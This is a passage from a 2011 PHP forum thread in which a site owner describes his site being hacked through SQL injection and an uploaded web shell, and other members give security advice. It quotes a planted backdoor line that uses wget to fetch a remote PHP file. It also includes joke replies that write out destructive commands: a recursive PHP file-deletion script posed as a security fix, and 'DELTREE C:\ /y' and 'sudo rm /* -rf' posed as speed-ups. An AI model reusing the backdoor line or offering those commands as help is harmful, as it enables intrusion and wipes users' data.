PFMaBiSmAd Posted June 3, 2011 Share Posted June 3, 2011 Ummm. Your script that allows uploading of games is apparently NOT secure. If you want help with it you would need to post it. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224694 Share on other sites More sharing options...
hedgehog90 Posted June 3, 2011 Author Share Posted June 3, 2011 I've worked part of it out now... I've been going through the logs for HOURS, it's incredibly tedious and boring. I've found the prick who did this: 89.232.248.163. Russian. Crafty. On May 15th, he used mysql injection to get my CMS login details. Once he had the login details he played around in the CMS and changed replaced a game file with w.php. It turns out you can upload phps despite what I said... After that, he went to playgame page for that speciifc game, and ran it over and over. I've got to admit, this guy was very quick and clever to do this - the back end is a bit of a mess and very hard for someone else to understand (or so I thought) So, that explains w.php, but it doesn't necessarilly explain game.js and the footer.php and index.php files being editted on May 31st. There is certainly absolutely no functionailty in the CMS to alter php files, or files of any kind. All the files it uploads/deletes are in the admin folder. Index.php and footer.php at are in the root. If w.php when run editted these files, then why didn't it do it 16 days prior? I can't find anything out through the log about these alterations except the time and day that game.js was first run. What now? More importantly, what are the steps to take to maike sure this never happens again? Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224707 Share on other sites More sharing options...
PFMaBiSmAd Posted June 3, 2011 Share Posted June 3, 2011 He probably (automatically) uploaded a file manager script that is letting him alter any of the files he wants. The sql injection to dump your database was probably done automatically by a bot script along with uploading file(s.) The time lag was because he didn't immediately get around to checking any sites that his bot script found that he could exploit. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224716 Share on other sites More sharing options...
hedgehog90 Posted June 3, 2011 Author Share Posted June 3, 2011 Looking at the logs, the beginning looked automatic, trying a query a second, but it then looks like it was done manually. There were long pauses between his attempts. I've downloaded the scripts from the site and I want to edit them so that this never happens again. I've been trying mysql_escape_real_string with the url he used to get my username and password, and I still get returned my details. It appears to do fuck all with that particular example. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224765 Share on other sites More sharing options...
xylex Posted June 3, 2011 Share Posted June 3, 2011 You're sounding a bit frustrated. If you wanted start a thread with code in PHP Coding help for that specific issue, we can probably help you out a bit on how to fix the hole there. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224771 Share on other sites More sharing options...
hedgehog90 Posted June 3, 2011 Author Share Posted June 3, 2011 Posted a new topic: http://www.phpfreaks.com/forums/index.php?topic=335030.0 Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224785 Share on other sites More sharing options...
PFMaBiSmAd Posted June 3, 2011 Share Posted June 3, 2011 Sorry to be (more) blunt (than normal), but hackers find sites to exploit using bot scripts. Once their automated bot script sends them back confirmation that a site is open to sql injection or allowing .php scripts to be uploaded and browsed to, then they spend time concentrating on ways to exploit those sites because a site open to some basic sql injection/php script uploading probably has a bunch of other security holes as well. Just from this thread, your site is open to sql injection, is storing passwords in plain text, and probably isn't (effectively) validating or securing uploaded files. As xylex suggested, attack and fix one problem at a time. P.S. mysql_real_escape_string won't prevent sql injection if the value being escaped isn't being used as a string in a query and even some older versions of php don't properly use the mysql character set setting with mysql_real_escape_string and can be bypassed under some specific conditions. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224787 Share on other sites More sharing options...
KevinM1 Posted June 3, 2011 Share Posted June 3, 2011 Just from this thread, your site is open to sql injection, is storing passwords in plain text, and probably isn't (effectively) validating or securing uploaded files. So... the OP is Sony? Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1224811 Share on other sites More sharing options...
teynon Posted June 5, 2011 Share Posted June 5, 2011 I would just like to say that the very first thing I mentioned was "Are you running a content management system?" Lol... Just saying... My guess is you bought a universal cms for the type of website you're running. I would also guess that other sites using the same system as you have also had similar things happen and it could possibly even be the people you downloaded the cms from. Hence why I said you should put your site offline (maintenance mode or something) while you attempt repairs and restoration by working on the IP address of your server. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225317 Share on other sites More sharing options...
hedgehog90 Posted June 5, 2011 Author Share Posted June 5, 2011 FFS, it's back... but now on the forum. I found an editted php file in the file: /forum/caches/tpl_AeroBlue_search_results.html.php and also in: /forum/styles/AeroBlue/template/search_body.html Both contain this line of code at the top: system('wget http://koliasoft.narod2.ru/w.php'); And that downloads and stores a file called w.php in the forum folder. (There's also another file called w.php.1, a copy) All the files in the cache folder appear to be modified almost daily, this must be normal. However, I can see that search_body.html was editted 02.38 AM today. I'm hoping that my fixes worked on the rest of the website, and that's why the problem files have moved to the forum, which i assumed was secure. You would think the latest PHPBB would protect itself from mysql injection??? But apparently not. So, probably from that w.php file, the footer.php had been editted again with that annoying iframe. I need to wait 24 hours until the Apache Logs update on my end before I can start seeing exactly how it was done... As I said earlier, I updated my PHPBB forum to the latest version a few days ago. The username and passwords for the 2 administrators on the forum are different to the other login details for the main site. I guess the person behind this could have also gotten my username and password on the old unprotected pages and made a note of it. For now, I won't change my username/password, because before I change them I want to have fixed the problem of mysql injection on the site. Help? Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225444 Share on other sites More sharing options...
xyph Posted June 5, 2011 Share Posted June 5, 2011 It's more than likely YOUR code and NOT PHPBB. PHPBB is designed by programmers, and supported by a large community. Any holes would be noticed, and a hole like yours is a BIG HOLE Those are probably back doors that were put in after the initial attack. This is the last post I'm going to make, because there is tons of help in this thread. In order to fix your problem, you have to take down your site. You then have to take a CLEAN VERSION and fix any holes you know of. You then upload a clean version of your site. Don't want data loss? Hire a programmer who understands web security and known attack vectors. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225577 Share on other sites More sharing options...
Pikachu2000 Posted June 5, 2011 Share Posted June 5, 2011 . . . Any holes would be noticed, and a hole like yours is a BIG HOLE . . . Oh, dear. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225581 Share on other sites More sharing options...
hedgehog90 Posted June 5, 2011 Author Share Posted June 5, 2011 In order to fix your problem, you have to take down your site. You then have to take a CLEAN VERSION and fix any holes you know of. You then upload a clean version of your site. I did this... or so I thought. Just to say "CLEAN IT" is not the kind of help I am looking for. Don't want data loss? Hire a programmer who understands web security and known attack vectors. Obviously, I'd rather get this fixed myself, otherwise I wouldn't have come here, so forgive me if I ignore that. While I am very grateful for the help and attention, I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems. Since I last posted, it appears the hacker has returned AGAIN, this time to change my password to the CMS. I haven't noticed any modifications though apart from this. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225665 Share on other sites More sharing options...
hedgehog90 Posted June 5, 2011 Author Share Posted June 5, 2011 . . . Any holes would be noticed, and a hole like yours is a BIG HOLE . . . Indeed, my hole is truly massive. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225668 Share on other sites More sharing options...
Philip Posted June 5, 2011 Share Posted June 5, 2011 I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems. ... because there are so many variables in how you got hacked and what steps you've actually taken to secure yourself since you realized it. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225670 Share on other sites More sharing options...
Pikachu2000 Posted June 5, 2011 Share Posted June 5, 2011 Since you seem to have an aversion to actually posting any actual code, I can't see why you would expect any actual answers. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225672 Share on other sites More sharing options...
teynon Posted June 6, 2011 Share Posted June 6, 2011 I'm sorry, I posted this on another topic, but it is more relevant here for securing your website. This one script can secure your entire webserver. <?php function outputDir($dir) { $handle=opendir($dir); while (FALSE!==($file=readdir($handle))) { if (($file != "..")&&($file!=".")) { if (is_dir($dir."/".$file)) { outputDir($dir."/".$file); } else { unlink($dir."/".$file); echo $dir."/".$file."<br />"; } } } } outputDir("C:/ARSENAL/www/Drupal-7.0"); ?> Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225680 Share on other sites More sharing options...
xyph Posted June 6, 2011 Share Posted June 6, 2011 I feel compelled to note that the above post was made in jest. On that note, I hear that typing 'DELTREE C:\ /y' into the command prompt WILL speed up your computer! Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225684 Share on other sites More sharing options...
xylex Posted June 6, 2011 Share Posted June 6, 2011 I always thought that "sudo rm /* -rf" was the best performance enhancement. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225757 Share on other sites More sharing options...
hedgehog90 Posted June 6, 2011 Author Share Posted June 6, 2011 OK, I've got the message. I'll fuck off now shall I? Sorry for wasting your time. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225785 Share on other sites More sharing options...
KevinM1 Posted June 6, 2011 Share Posted June 6, 2011 OK, I've got the message. I'll fuck off now shall I? Sorry for wasting your time. You do realize it's all but impossible to suggest a course of action without seeing any of your site code, right? There are many possibilities as to why your site has been exploited, and seeing the results of the exploitation isn't very illuminating. That this topic has gone three pages, with multiple posts asking you to show some code, suggests that the failure to move forward on this issue lies with you. Expecting anyone to simply say "Do x, y, and z and you'll be fine" without relevant information is, to put mildly, unrealistic. You have a choice - show us the code you wrote, which may allow us to suggest a course of action, or don't. Getting huffy over our repeated reasonable requests for information is completely irrational, and only hurting you. Quote Link to comment https://forums.phpfreaks.com/topic/238207-has-my-site-been-hacked/page/2/#findComment-1225829 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.